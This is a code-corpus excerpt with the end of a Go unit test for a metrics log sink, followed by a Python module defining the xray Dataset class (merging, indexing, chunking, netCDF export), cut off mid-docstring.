MetricSets: make(map[string]*core.MetricSet),
}
batch.MetricSets["pod1"] = &core.MetricSet{
Labels: map[string]string{"bzium": "hocuspocus"},
MetricValues: map[string]core.MetricValue{
"m1": {
ValueType: core.ValueInt64,
MetricType: core.MetricGauge,
IntValue: 31415,
},
},
LabeledMetrics: []core.LabeledMetric{
{
Name: "lm",
MetricValue: core.MetricValue{
MetricType: core.MetricGauge,
ValueType: core.ValueInt64,
IntValue: 279,
},
Labels: map[string]string{
"disk": "hard",
},
},
},
}
log := batchToString(&batch)
assert.True(t, strings.Contains(log, "31415"))
assert.True(t, strings.Contains(log, "m1"))
assert.True(t, strings.Contains(log, "bzium"))
assert.True(t, strings.Contains(log, "hocuspocus"))
assert.True(t, strings.Contains(log, "pod1"))
assert.True(t, strings.Contains(log, "279"))
assert.True(t, strings.Contains(log, "disk"))
assert.True(t, strings.Contains(log, "hard"))
assert.True(t, strings.Contains(log, fmt.Sprintf("%s", now)))
}
func TestSortedOutput(t *testing.T) {
const (
label1 = "abcLabel"
label2 = "xyzLabel"
pod1 = "pod1"
pod2 = "pod2"
metric1 = "metricA"
metric2 = "metricB"
)
metricVal := core.MetricValue{
ValueType: core.ValueInt64,
MetricType: core.MetricGauge,
IntValue: 31415,
}
metricSet := func(pod string) *core.MetricSet {
return &core.MetricSet{
Labels: map[string]string{label2 + pod: pod, label1 + pod: pod},
MetricValues: map[string]core.MetricValue{
metric2 + pod: metricVal,
metric1 + pod: metricVal,
},
LabeledMetrics: []core.LabeledMetric{},
}
}
now := time.Now()
batch := core.DataBatch{
Timestamp: now,
MetricSets: map[string]*core.MetricSet{
pod2: metricSet(pod2),
pod1: metricSet(pod1),
},
}
log := batchToString(&batch)
sorted := []string{
pod1,
label1 + pod1,
label2 + pod1,
metric1 + pod1,
metric2 + pod1,
pod2,
label1 + pod2,
label2 + pod2,
metric1 + pod2,
metric2 + pod2,
}
var (
previous string
previousIndex int
)
for _, metric := range sorted {
metricIndex := strings.Index(log, metric)
assert.NotEqual(t, -1, metricIndex, "%q not found", metric)
if previous != "" {
assert.True(t, previousIndex < metricIndex, "%q should be before %q", previous, metric)
}
previous = metric
previousIndex = metricIndex
}
}
| adfin/statster | metrics/sinks/log/log_sink_test.go | GO | apache-2.0 | 3,246 |
import functools
import warnings
from collections import Mapping, Sequence
from numbers import Number
import numpy as np
import pandas as pd
from . import ops
from . import utils
from . import common
from . import groupby
from . import indexing
from . import alignment
from . import formatting
from .. import conventions
from .alignment import align, partial_align
from .coordinates import DatasetCoordinates, Indexes
from .common import ImplementsDatasetReduce, BaseDataObject
from .utils import (Frozen, SortedKeysDict, ChainMap, maybe_wrap_array)
from .variable import as_variable, Variable, Coordinate, broadcast_variables
from .pycompat import (iteritems, itervalues, basestring, OrderedDict,
dask_array_type)
from .combine import concat
# list of attributes of pd.DatetimeIndex that are ndarrays of time info
_DATETIMEINDEX_COMPONENTS = ['year', 'month', 'day', 'hour', 'minute',
'second', 'microsecond', 'nanosecond', 'date',
'time', 'dayofyear', 'weekofyear', 'dayofweek',
'quarter']
def _get_virtual_variable(variables, key):
"""Get a virtual variable (e.g., 'time.year') from a dict of xray.Variable
objects (if possible)
"""
if not isinstance(key, basestring):
raise KeyError(key)
split_key = key.split('.', 1)
if len(split_key) != 2:
raise KeyError(key)
ref_name, var_name = split_key
ref_var = variables[ref_name]
if ref_var.ndim == 1:
date = ref_var.to_index()
elif ref_var.ndim == 0:
date = pd.Timestamp(ref_var.values)
else:
raise KeyError(key)
if var_name == 'season':
# TODO: move 'season' into pandas itself
seasons = np.array(['DJF', 'MAM', 'JJA', 'SON'])
month = date.month
data = seasons[(month // 3) % 4]
else:
data = getattr(date, var_name)
return ref_name, var_name, Variable(ref_var.dims, data)
def _as_dataset_variable(name, var):
"""Prepare a variable for adding it to a Dataset
"""
try:
var = as_variable(var, key=name)
except TypeError:
raise TypeError('Dataset variables must be an array or a tuple of '
'the form (dims, data[, attrs, encoding])')
if name in var.dims:
# convert the into an Index
if var.ndim != 1:
raise ValueError('an index variable must be defined with '
'1-dimensional data')
var = var.to_coord()
return var
def _align_variables(variables, join='outer'):
"""Align all DataArrays in the provided dict, leaving other values alone.
"""
alignable = [k for k, v in variables.items() if hasattr(v, 'indexes')]
aligned = align(*[variables[a] for a in alignable],
join=join, copy=False)
new_variables = OrderedDict(variables)
new_variables.update(zip(alignable, aligned))
return new_variables
def _expand_variables(raw_variables, old_variables={}, compat='identical'):
"""Expand a dictionary of variables.
Returns a dictionary of Variable objects suitable for inserting into a
Dataset._variables dictionary.
This includes converting tuples (dims, data) into Variable objects,
converting coordinate variables into Coordinate objects and expanding
DataArray objects into Variables plus coordinates.
Raises ValueError if any conflicting values are found, between any of the
new or old variables.
"""
new_variables = OrderedDict()
new_coord_names = set()
variables = ChainMap(new_variables, old_variables)
def maybe_promote_or_replace(name, var):
existing_var = variables[name]
if name not in existing_var.dims:
if name in var.dims:
variables[name] = var
else:
common_dims = OrderedDict(zip(existing_var.dims,
existing_var.shape))
common_dims.update(zip(var.dims, var.shape))
variables[name] = existing_var.expand_dims(common_dims)
new_coord_names.update(var.dims)
def add_variable(name, var):
var = _as_dataset_variable(name, var)
if name not in variables:
variables[name] = var
new_coord_names.update(variables[name].dims)
else:
if not getattr(variables[name], compat)(var):
raise ValueError('conflicting value for variable %s:\n'
'first value: %r\nsecond value: %r'
% (name, variables[name], var))
if compat == 'broadcast_equals':
maybe_promote_or_replace(name, var)
for name, var in iteritems(raw_variables):
if hasattr(var, 'coords'):
# it's a DataArray
new_coord_names.update(var.coords)
for dim, coord in iteritems(var.coords):
if dim != name:
add_variable(dim, coord.variable)
var = var.variable
add_variable(name, var)
return new_variables, new_coord_names
def _calculate_dims(variables):
"""Calculate the dimensions corresponding to a set of variables.
Returns dictionary mapping from dimension names to sizes. Raises ValueError
if any of the dimension sizes conflict.
"""
dims = {}
last_used = {}
scalar_vars = set(k for k, v in iteritems(variables) if not v.dims)
for k, var in iteritems(variables):
for dim, size in zip(var.dims, var.shape):
if dim in scalar_vars:
raise ValueError('dimension %s already exists as a scalar '
'variable' % dim)
if dim not in dims:
dims[dim] = size
last_used[dim] = k
elif dims[dim] != size:
raise ValueError('conflicting sizes for dimension %r: '
'length %s on %r and length %s on %r' %
(dim, size, k, dims[dim], last_used[dim]))
return dims
def _merge_expand(aligned_self, other, overwrite_vars, compat):
possible_conflicts = dict((k, v) for k, v in aligned_self._variables.items()
if k not in overwrite_vars)
new_vars, new_coord_names = _expand_variables(other, possible_conflicts, compat)
replace_vars = aligned_self._variables.copy()
replace_vars.update(new_vars)
return replace_vars, new_vars, new_coord_names
def _merge_dataset(self, other, overwrite_vars, compat, join):
aligned_self, other = partial_align(self, other, join=join, copy=False)
replace_vars, new_vars, new_coord_names = _merge_expand(
aligned_self, other._variables, overwrite_vars, compat)
new_coord_names.update(other._coord_names)
return replace_vars, new_vars, new_coord_names
def _merge_dict(self, other, overwrite_vars, compat, join):
other = _align_variables(other, join='outer')
alignable = [k for k, v in other.items() if hasattr(v, 'indexes')]
aligned = partial_align(self, *[other[a] for a in alignable],
join=join, copy=False, exclude=overwrite_vars)
aligned_self = aligned[0]
other = OrderedDict(other)
other.update(zip(alignable, aligned[1:]))
return _merge_expand(aligned_self, other, overwrite_vars, compat)
def _assert_empty(args, msg='%s'):
if args:
raise ValueError(msg % args)
def as_dataset(obj):
"""Cast the given object to a Dataset.
Handles DataArrays, Datasets and dictionaries of variables. A new Dataset
object is only created in the last case.
"""
obj = getattr(obj, '_dataset', obj)
if not isinstance(obj, Dataset):
obj = Dataset(obj)
return obj
class Variables(Mapping):
def __init__(self, dataset):
self._dataset = dataset
def __iter__(self):
return (key for key in self._dataset._variables
if key not in self._dataset._coord_names)
def __len__(self):
return len(self._dataset._variables) - len(self._dataset._coord_names)
def __contains__(self, key):
return (key in self._dataset._variables
and key not in self._dataset._coord_names)
def __getitem__(self, key):
if key not in self._dataset._coord_names:
return self._dataset[key]
else:
raise KeyError(key)
def __repr__(self):
return formatting.vars_repr(self)
class _LocIndexer(object):
def __init__(self, dataset):
self.dataset = dataset
def __getitem__(self, key):
if not utils.is_dict_like(key):
raise TypeError('can only lookup dictionaries from Dataset.loc')
return self.dataset.sel(**key)
class Dataset(Mapping, ImplementsDatasetReduce, BaseDataObject):
"""A multi-dimensional, in memory, array database.
A dataset resembles an in-memory representation of a NetCDF file, and
consists of variables, coordinates and attributes which together form a
self describing dataset.
Dataset implements the mapping interface with keys given by variable names
and values given by DataArray objects for each variable name.
One dimensional variables with name equal to their dimension are index
coordinates used for label based indexing.
"""
# class properties defined for the benefit of __setstate__, which otherwise
# runs into trouble because we overrode __getattr__
_attrs = None
_variables = Frozen({})
groupby_cls = groupby.DatasetGroupBy
def __init__(self, variables=None, coords=None, attrs=None,
compat='broadcast_equals'):
"""To load data from a file or file-like object, use the `open_dataset`
function.
Parameters
----------
variables : dict-like, optional
A mapping from variable names to :py:class:`~xray.DataArray`
objects, :py:class:`~xray.Variable` objects or tuples of the
form ``(dims, data[, attrs])`` which can be used as arguments to
create a new ``Variable``. Each dimension must have the same length
in all variables in which it appears.
coords : dict-like, optional
Another mapping in the same form as the `variables` argument,
except the each item is saved on the dataset as a "coordinate".
These variables have an associated meaning: they describe
constant/fixed/independent quantities, unlike the
varying/measured/dependent quantities that belong in `variables`.
Coordinates values may be given by 1-dimensional arrays or scalars,
in which case `dims` do not need to be supplied: 1D arrays will be
assumed to give index values along the dimension with the same
name.
attrs : dict-like, optional
Global attributes to save on this dataset.
compat : {'broadcast_equals', 'equals', 'identical'}, optional
String indicating how to compare variables of the same name for
potential conflicts:
- 'broadcast_equals': all values must be equal when variables are
broadcast against each other to ensure common dimensions.
- 'equals': all values and dimensions must be the same.
- 'identical': all values, dimensions and attributes must be the
same.
"""
self._variables = OrderedDict()
self._coord_names = set()
self._dims = {}
self._attrs = None
self._file_obj = None
if variables is None:
variables = {}
if coords is None:
coords = set()
if variables or coords:
self._set_init_vars_and_dims(variables, coords, compat)
if attrs is not None:
self.attrs = attrs
def _add_missing_coords_inplace(self):
"""Add missing coordinates to self._variables
"""
for dim, size in iteritems(self.dims):
if dim not in self._variables:
# This is equivalent to np.arange(size), but
# waits to create the array until its actually accessed.
data = indexing.LazyIntegerRange(size)
coord = Coordinate(dim, data)
self._variables[dim] = coord
def _update_vars_and_coords(self, new_variables, new_coord_names={},
needs_copy=True, check_coord_names=True):
"""Add a dictionary of new variables to this dataset.
Raises a ValueError if any dimensions have conflicting lengths in the
new dataset. Otherwise will update this dataset's _variables and
_dims attributes in-place.
Set `needs_copy=False` only if this dataset is brand-new and hence
can be thrown away if this method fails.
"""
# default to creating another copy of variables so can unroll if we end
# up with inconsistent dimensions
variables = self._variables.copy() if needs_copy else self._variables
if check_coord_names:
_assert_empty([k for k in self.data_vars if k in new_coord_names],
'coordinates with these names already exist as '
'variables: %s')
variables.update(new_variables)
dims = _calculate_dims(variables)
# all checks are complete: it's safe to update
self._variables = variables
self._dims = dims
self._add_missing_coords_inplace()
self._coord_names.update(new_coord_names)
def _set_init_vars_and_dims(self, vars, coords, compat):
"""Set the initial value of Dataset variables and dimensions
"""
_assert_empty([k for k in vars if k in coords],
'redundant variables and coordinates: %s')
variables = ChainMap(vars, coords)
aligned = _align_variables(variables)
new_variables, new_coord_names = _expand_variables(aligned,
compat=compat)
new_coord_names.update(coords)
self._update_vars_and_coords(new_variables, new_coord_names,
needs_copy=False, check_coord_names=False)
@classmethod
def load_store(cls, store, decoder=None):
"""Create a new dataset from the contents of a backends.*DataStore
object
"""
variables, attributes = store.load()
if decoder:
variables, attributes = decoder(variables, attributes)
obj = cls(variables, attrs=attributes)
obj._file_obj = store
return obj
def close(self):
"""Close any files linked to this dataset
"""
if self._file_obj is not None:
self._file_obj.close()
self._file_obj = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getstate__(self):
"""Always load data in-memory before pickling"""
self.load()
# self.__dict__ is the default pickle object, we don't need to
# implement our own __setstate__ method to make pickle work
state = self.__dict__.copy()
# throw away any references to datastores in the pickle
state['_file_obj'] = None
return state
@property
def variables(self):
"""Frozen dictionary of xray.Variable objects constituting this
dataset's data
"""
return Frozen(self._variables)
def _attrs_copy(self):
return None if self._attrs is None else OrderedDict(self._attrs)
@property
def attrs(self):
"""Dictionary of global attributes on this dataset
"""
if self._attrs is None:
self._attrs = OrderedDict()
return self._attrs
@attrs.setter
def attrs(self, value):
self._attrs = OrderedDict(value)
@property
def dims(self):
"""Mapping from dimension names to lengths.
This dictionary cannot be modified directly, but is updated when adding
new variables.
"""
return Frozen(SortedKeysDict(self._dims))
def load(self):
"""Manually trigger loading of this dataset's data from disk or a
remote source into memory and return this dataset.
Normally, it should not be necessary to call this method in user code,
because all xray functions should either work on deferred data or
load data automatically. However, this method can be necessary when
working with many file objects on disk.
"""
# access .data to coerce everything to numpy or dask arrays
all_data = dict((k, v.data) for k, v in self.variables.items())
lazy_data = dict((k, v) for k, v in all_data.items()
if isinstance(v, dask_array_type))
if lazy_data:
import dask.array as da
# evaluate all the dask arrays simultaneously
evaluated_data = da.compute(*lazy_data.values())
evaluated_variables = {}
for k, data in zip(lazy_data, evaluated_data):
self.variables[k].data = data
return self
def load_data(self): # pragma: no cover
warnings.warn('the Dataset method `load_data` has been deprecated; '
'use `load` instead',
FutureWarning, stacklevel=2)
return self.load()
@classmethod
def _construct_direct(cls, variables, coord_names, dims, attrs,
file_obj=None):
"""Shortcut around __init__ for internal use when we want to skip
costly validation
"""
obj = object.__new__(cls)
obj._variables = variables
obj._coord_names = coord_names
obj._dims = dims
obj._attrs = attrs
obj._file_obj = file_obj
return obj
__default_attrs = object()
def _replace_vars_and_dims(self, variables, coord_names=None,
attrs=__default_attrs, inplace=False):
"""Fastpath constructor for internal use.
Preserves coord names and attributes; dimensions are recalculated from
the supplied variables.
The arguments are *not* copied when placed on the new dataset. It is up
to the caller to ensure that they have the right type and are not used
elsewhere.
Parameters
----------
variables : OrderedDict
coord_names : set or None, optional
attrs : OrderedDict or None, optional
Returns
-------
new : Dataset
"""
dims = _calculate_dims(variables)
if inplace:
self._dims = dims
self._variables = variables
if coord_names is not None:
self._coord_names = coord_names
if attrs is not self.__default_attrs:
self._attrs = attrs
obj = self
else:
if coord_names is None:
coord_names = self._coord_names.copy()
if attrs is self.__default_attrs:
attrs = self._attrs_copy()
obj = self._construct_direct(variables, coord_names, dims, attrs)
return obj
def copy(self, deep=False):
"""Returns a copy of this dataset.
If `deep=True`, a deep copy is made of each of the component variables.
Otherwise, a shallow copy is made, so each variable in the new dataset
is also a variable in the original dataset.
"""
if deep:
variables = OrderedDict((k, v.copy(deep=True))
for k, v in iteritems(self._variables))
else:
variables = self._variables.copy()
# skip __init__ to avoid costly validation
return self._construct_direct(variables, self._coord_names.copy(),
self._dims.copy(), self._attrs_copy())
def _copy_listed(self, names, keep_attrs=True):
"""Create a new Dataset with the listed variables from this dataset and
the all relevant coordinates. Skips all validation.
"""
variables = OrderedDict()
coord_names = set()
for name in names:
try:
variables[name] = self._variables[name]
except KeyError:
ref_name, var_name, var = _get_virtual_variable(
self._variables, name)
variables[var_name] = var
if ref_name in self._coord_names:
coord_names.add(var_name)
needed_dims = set()
for v in variables.values():
needed_dims.update(v._dims)
for k in self._coord_names:
if set(self._variables[k]._dims) <= needed_dims:
variables[k] = self._variables[k]
coord_names.add(k)
dims = dict((k, self._dims[k]) for k in needed_dims)
attrs = self.attrs.copy() if keep_attrs else None
return self._construct_direct(variables, coord_names, dims, attrs)
def __copy__(self):
return self.copy(deep=False)
def __deepcopy__(self, memo=None):
# memo does nothing but is required for compatibility with
# copy.deepcopy
return self.copy(deep=True)
def __contains__(self, key):
"""The 'in' operator will return true or false depending on whether
'key' is an array in the dataset or not.
"""
return key in self._variables
def __len__(self):
return len(self._variables)
def __iter__(self):
return iter(self._variables)
@property
def nbytes(self):
return sum(v.nbytes for v in self.variables.values())
@property
def loc(self):
"""Attribute for location based indexing. Only supports __getitem__,
and only when the key is a dict of the form {dim: labels}.
"""
return _LocIndexer(self)
def __getitem__(self, key):
"""Access variables or coordinates this dataset as a
:py:class:`~xray.DataArray`.
Indexing with a list of names will return a new ``Dataset`` object.
"""
from .dataarray import DataArray
if utils.is_dict_like(key):
return self.isel(**key)
key = np.asarray(key)
if key.ndim == 0:
return DataArray._new_from_dataset(self, key.item())
else:
return self._copy_listed(key)
def __setitem__(self, key, value):
"""Add an array to this dataset.
If value is a `DataArray`, call its `select_vars()` method, rename it
to `key` and merge the contents of the resulting dataset into this
dataset.
If value is an `Variable` object (or tuple of form
``(dims, data[, attrs])``), add it to this dataset as a new
variable.
"""
if utils.is_dict_like(key):
raise NotImplementedError('cannot yet use a dictionary as a key '
'to set Dataset values')
self.update({key: value})
def __delitem__(self, key):
"""Remove a variable from this dataset.
If this variable is a dimension, all variables containing this
dimension are also removed.
"""
def remove(k):
del self._variables[k]
self._coord_names.discard(k)
remove(key)
if key in self._dims:
del self._dims[key]
also_delete = [k for k, v in iteritems(self._variables)
if key in v.dims]
for key in also_delete:
remove(key)
# mutable objects should not be hashable
__hash__ = None
def _all_compat(self, other, compat_str):
"""Helper function for equals and identical"""
# some stores (e.g., scipy) do not seem to preserve order, so don't
# require matching order for equality
compat = lambda x, y: getattr(x, compat_str)(y)
return (self._coord_names == other._coord_names
and utils.dict_equiv(self._variables, other._variables,
compat=compat))
def broadcast_equals(self, other):
"""Two Datasets are broadcast equal if they are equal after
broadcasting all variables against each other.
For example, variables that are scalar in one dataset but non-scalar in
the other dataset can still be broadcast equal if the the non-scalar
variable is a constant.
See Also
--------
Dataset.equals
Dataset.identical
"""
try:
return self._all_compat(other, 'broadcast_equals')
except (TypeError, AttributeError):
return False
def equals(self, other):
"""Two Datasets are equal if they have matching variables and
coordinates, all of which are equal.
Datasets can still be equal (like pandas objects) if they have NaN
values in the same locations.
This method is necessary because `v1 == v2` for ``Dataset``
does element-wise comparisions (like numpy.ndarrays).
See Also
--------
Dataset.broadcast_equals
Dataset.identical
"""
try:
return self._all_compat(other, 'equals')
except (TypeError, AttributeError):
return False
def identical(self, other):
"""Like equals, but also checks all dataset attributes and the
attributes on all variables and coordinates.
See Also
--------
Dataset.broadcast_equals
Dataset.equals
"""
try:
return (utils.dict_equiv(self.attrs, other.attrs)
and self._all_compat(other, 'identical'))
except (TypeError, AttributeError):
return False
@property
def indexes(self):
"""OrderedDict of pandas.Index objects used for label based indexing
"""
return Indexes(self)
@property
def coords(self):
"""Dictionary of xray.DataArray objects corresponding to coordinate
variables
"""
return DatasetCoordinates(self)
@property
def data_vars(self):
"""Dictionary of xray.DataArray objects corresponding to data variables
"""
return Variables(self)
@property
def vars(self): # pragma: no cover
warnings.warn('the Dataset property `vars` has been deprecated; '
'use `data_vars` instead',
FutureWarning, stacklevel=2)
return self.data_vars
def set_coords(self, names, inplace=False):
"""Given names of one or more variables, set them as coordinates
Parameters
----------
names : str or list of str
Name(s) of variables in this dataset to convert into coordinates.
inplace : bool, optional
If True, modify this dataset inplace. Otherwise, create a new
object.
Returns
-------
Dataset
"""
# TODO: allow inserting new coordinates with this method, like
# DataFrame.set_index?
# nb. check in self._variables, not self.data_vars to insure that the
# operation is idempotent
if isinstance(names, basestring):
names = [names]
self._assert_all_in_dataset(names)
obj = self if inplace else self.copy()
obj._coord_names.update(names)
return obj
def reset_coords(self, names=None, drop=False, inplace=False):
"""Given names of coordinates, reset them to become variables
Parameters
----------
names : str or list of str, optional
Name(s) of non-index coordinates in this dataset to reset into
variables. By default, all non-index coordinates are reset.
drop : bool, optional
If True, remove coordinates instead of converting them into
variables.
inplace : bool, optional
If True, modify this dataset inplace. Otherwise, create a new
object.
Returns
-------
Dataset
"""
if names is None:
names = self._coord_names - set(self.dims)
else:
if isinstance(names, basestring):
names = [names]
self._assert_all_in_dataset(names)
_assert_empty(
set(names) & set(self.dims),
'cannot remove index coordinates with reset_coords: %s')
obj = self if inplace else self.copy()
obj._coord_names.difference_update(names)
if drop:
for name in names:
del obj._variables[name]
return obj
def dump_to_store(self, store, encoder=None, sync=True):
"""Store dataset contents to a backends.*DataStore object."""
variables, attrs = conventions.encode_dataset_coordinates(self)
if encoder:
variables, attrs = encoder(variables, attrs)
store.store(variables, attrs)
if sync:
store.sync()
def to_netcdf(self, path=None, mode='w', format=None, group=None,
engine=None):
"""Write dataset contents to a netCDF file.
Parameters
----------
path : str, optional
Path to which to save this dataset. If no path is provided, this
function returns the resulting netCDF file as a bytes object; in
this case, we need to use scipy.io.netcdf, which does not support
netCDF version 4 (the default format becomes NETCDF3_64BIT).
mode : {'w', 'a'}, optional
Write ('w') or append ('a') mode. If mode='w', any existing file at
this location will be overwritten.
format : {'NETCDF4', 'NETCDF4_CLASSIC', 'NETCDF3_64BIT', 'NETCDF3_CLASSIC'}, optional
File format for the resulting netCDF file:
* NETCDF4: Data is stored in an HDF5 file, using netCDF4 API
features.
* NETCDF4_CLASSIC: Data is stored in an HDF5 file, using only
netCDF 3 compatibile API features.
* NETCDF3_64BIT: 64-bit offset version of the netCDF 3 file format,
which fully supports 2+ GB files, but is only compatible with
clients linked against netCDF version 3.6.0 or later.
* NETCDF3_CLASSIC: The classic netCDF 3 file format. It does not
handle 2+ GB files very well.
All formats are supported by the netCDF4-python library.
scipy.io.netcdf only supports the last two formats.
The default format is NETCDF4 if you are saving a file to disk and
have the netCDF4-python library available. Otherwise, xray falls
back to using scipy to write netCDF files and defaults to the
NETCDF3_64BIT format (scipy does not support netCDF4).
group : str, optional
Path to the netCDF4 group in the given file to open (only works for
format='NETCDF4'). The group(s) will be created if necessary.
engine : {'netcdf4', 'scipy', 'h5netcdf'}, optional
Engine to use when writing netCDF files. If not provided, the
default engine is chosen based on available dependencies, with a
preference for 'netcdf4' if writing to a file on disk.
"""
from ..backends.api import to_netcdf
return to_netcdf(self, path, mode, format, group, engine)
dump = utils.function_alias(to_netcdf, 'dumps')
dumps = utils.function_alias(to_netcdf, 'dumps')
def __repr__(self):
return formatting.dataset_repr(self)
@property
def chunks(self):
"""Block dimensions for this dataset's data or None if it's not a dask
array.
"""
chunks = {}
for v in self.variables.values():
if v.chunks is not None:
new_chunks = list(zip(v.dims, v.chunks))
if any(chunk != chunks[d] for d, chunk in new_chunks
if d in chunks):
raise ValueError('inconsistent chunks')
chunks.update(new_chunks)
return Frozen(SortedKeysDict(chunks))
def chunk(self, chunks=None, lock=False):
"""Coerce all arrays in this dataset into dask arrays with the given
chunks.
Non-dask arrays in this dataset will be converted to dask arrays. Dask
arrays will be rechunked to the given chunk sizes.
If neither chunks is not provided for one or more dimensions, chunk
sizes along that dimension will not be updated; non-dask arrays will be
converted into dask arrays with a single block.
Parameters
----------
chunks : int or dict, optional
Chunk sizes along each dimension, e.g., ``5`` or
``{'x': 5, 'y': 5}``.
lock : optional
Passed on to :py:func:`dask.array.from_array`, if the array is not
already as dask array.
Returns
-------
chunked : xray.Dataset
"""
if isinstance(chunks, Number):
chunks = dict.fromkeys(self.dims, chunks)
if chunks is not None:
bad_dims = [d for d in chunks if d not in self.dims]
if bad_dims:
raise ValueError('some chunks keys are not dimensions on this '
'object: %s' % bad_dims)
def selkeys(dict_, keys):
if dict_ is None:
return None
return dict((d, dict_[d]) for d in keys if d in dict_)
def maybe_chunk(name, var, chunks):
chunks = selkeys(chunks, var.dims)
if not chunks:
chunks = None
if var.ndim > 0:
return var.chunk(chunks, name=name, lock=lock)
else:
return var
variables = OrderedDict([(k, maybe_chunk(k, v, chunks))
for k, v in self.variables.items()])
return self._replace_vars_and_dims(variables)
def isel(self, **indexers):
"""Returns a new dataset with each array indexed along the specified
dimension(s).
This method selects values from each array using its `__getitem__`
method, except this method does not require knowing the order of
each array's dimensions.
Parameters
----------
**indexers : {dim: indexer, ...}
Keyword arguments with names matching dimensions and values given
by integers, slice objects or arrays.
Returns
-------
obj : Dataset
A new Dataset with the same contents as this dataset, except each
array and dimension is indexed by the appropriate indexers. In
general, each array's data will be a view of the array's data
in this dataset, unless numpy fancy indexing was triggered by using
an array indexer, in which case the data will be a copy.
See Also
--------
Dataset.sel
DataArray.isel
DataArray.sel
"""
invalid = [k for k in indexers if not k in self.dims]
if invalid:
raise ValueError("dimensions %r do not exist" % invalid)
# all indexers should be int, slice or np.ndarrays
indexers = [(k, (np.asarray(v)
if not isinstance(v, (int, np.integer, slice))
else v))
for k, v in iteritems(indexers)]
variables = OrderedDict()
for name, var in iteritems(self._variables):
var_indexers = dict((k, v) for k, v in indexers if k in var.dims)
variables[name] = var.isel(**var_indexers)
return self._replace_vars_and_dims(variables)
def sel(self, method=None, **indexers):
"""Returns a new dataset with each array indexed by tick labels
along the specified dimension(s).
In contrast to `Dataset.isel`, indexers for this method should use
labels instead of integers.
Under the hood, this method is powered by using Panda's powerful Index
objects. This makes label based indexing essentially just as fast as
using integer indexing.
It also means this method uses pandas's (well documented) logic for
indexing. This means you can use string shortcuts for datetime indexes
(e.g., '2000-01' to select all values in January 2000). It also means
that slices are treated as inclusive of both the start and stop values,
unlike normal Python indexing.
Parameters
----------
method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
Method to use for inexact matches (requires pandas>=0.16):
* default: only exact matches
* pad / ffill: propgate last valid index value forward
* backfill / bfill: propagate next valid index value backward
* nearest: use nearest valid index value
**indexers : {dim: indexer, ...}
Keyword arguments with names matching dimensions and values given
by scalars, slices or arrays of tick labels.
Returns
-------
obj : Dataset
A new Dataset with the same contents as this dataset, except each
variable and dimension is indexed by the appropriate indexers. In
general, each variable's data will be a view of the variable's data
in this dataset, unless numpy fancy indexing was triggered by using
an array indexer, in which case the data will be a copy.
See Also
--------
Dataset.isel
DataArray.isel
DataArray.sel
"""
return self.isel(**indexing.remap_label_indexers(self, indexers,
method=method))
def isel_points(self, dim='points', **indexers):
"""Returns a new dataset with each array indexed pointwise along the
specified dimension(s).
This method selects pointwise values from each array and is akin to
the NumPy indexing behavior of `arr[[0, 1], [0, 1]]`, except this
method does not require knowing the order of each array's dimensions.
Parameters
----------
dim : str or DataArray or pandas.Index or other list-like object, optional
Name of the dimension to concatenate along. If dim is provided as a
string, it must be a new dimension name, in which case it is added
along axis=0. If dim is provided as a DataArray or Index or
list-like object, its name, which must not be present in the
dataset, is used as the dimension to concatenate along and the
values are added as a coordinate.
**indexers : {dim: indexer, ...}
Keyword arguments with names matching dimensions and values given
by array-like objects. All indexers must be the same length and
1 dimensional.
Returns
-------
obj : Dataset
A new Dataset with the same contents as this dataset, except each
array and dimension is indexed by the appropriate indexers. With
pointwise indexing, the new Dataset will always be a copy of the
original.
See Also
--------
Dataset.sel
DataArray.isel
DataArray.sel
DataArray.isel_points
"""
indexer_dims = set(indexers)
def relevant_keys(mapping):
return [k for k, v in mapping.items()
if any(d in indexer_dims for d in v.dims)]
data_vars = relevant_keys(self.data_vars)
coords = relevant_keys(self.coords)
# all the indexers should be iterables
keys = indexers.keys()
indexers = [(k, np.asarray(v)) for k, v in iteritems(indexers)]
# Check that indexers are valid dims, integers, and 1D
for k, v in indexers:
if k not in self.dims:
raise ValueError("dimension %s does not exist" % k)
if v.dtype.kind != 'i':
raise TypeError('Indexers must be integers')
if v.ndim != 1:
raise ValueError('Indexers must be 1 dimensional')
# all the indexers should have the same length
lengths = set(len(v) for k, v in indexers)
if len(lengths) > 1:
raise ValueError('All indexers must be the same length')
# Existing dimensions are not valid choices for the dim argument
if isinstance(dim, basestring):
if dim in self.dims:
# dim is an invalid string
raise ValueError('Existing dimension names are not valid '
'choices for the dim argument in sel_points')
elif hasattr(dim, 'dims'):
# dim is a DataArray or Coordinate
if dim.name in self.dims:
# dim already exists
raise ValueError('Existing dimensions are not valid choices '
'for the dim argument in sel_points')
else:
# try to cast dim to DataArray with name = points
from .dataarray import DataArray
dim = DataArray(dim, dims='points', name='points')
# TODO: This would be sped up with vectorized indexing. This will
# require dask to support pointwise indexing as well.
return concat([self.isel(**d) for d in
[dict(zip(keys, inds)) for inds in
zip(*[v for k, v in indexers])]],
dim=dim, coords=coords, data_vars=data_vars)
def reindex_like(self, other, method=None, copy=True):
"""Conform this object onto the indexes of another object, filling
in missing values with NaN.
Parameters
----------
other : Dataset or DataArray
Object with an 'indexes' attribute giving a mapping from dimension
names to pandas.Index objects, which provides coordinates upon
which to index the variables in this dataset. The indexes on this
other object need not be the same as the indexes on this
dataset. Any mis-matched index values will be filled in with
NaN, and any mis-matched dimension names will simply be ignored.
method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
Method to use for filling index values from other not found in this
dataset:
* default: don't fill gaps
* pad / ffill: propgate last valid index value forward
* backfill / bfill: propagate next valid index value backward
* nearest: use nearest valid index value (requires pandas>=0.16)
copy : bool, optional
If `copy=True`, the returned dataset contains only copied
variables. If `copy=False` and no reindexing is required then
original variables from this dataset are returned.
Returns
-------
reindexed : Dataset
Another dataset, with this dataset's data but coordinates from the
other object.
See Also
--------
Dataset.reindex
align
"""
return self.reindex(method=method, copy=copy, **other.indexes)
def reindex(self, indexers=None, method=None, copy=True, **kw_indexers):
"""Conform this object onto a new set of indexes, filling in
missing values with NaN.
Parameters
----------
indexers : dict. optional
Dictionary with keys given by dimension names and values given by
arrays of coordinates tick labels. Any mis-matched coordinate values
will be filled in with NaN, and any mis-matched dimension names will
simply be ignored.
method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
Method to use for filling index values in ``indexers`` not found in
this dataset:
* default: don't fill gaps
* pad / ffill: propgate last valid index value forward
* backfill / bfill: propagate next valid index value backward
* nearest: use nearest valid index value (requires pandas>=0.16)
copy : bool, optional
If `copy=True`, the returned dataset contains only copied
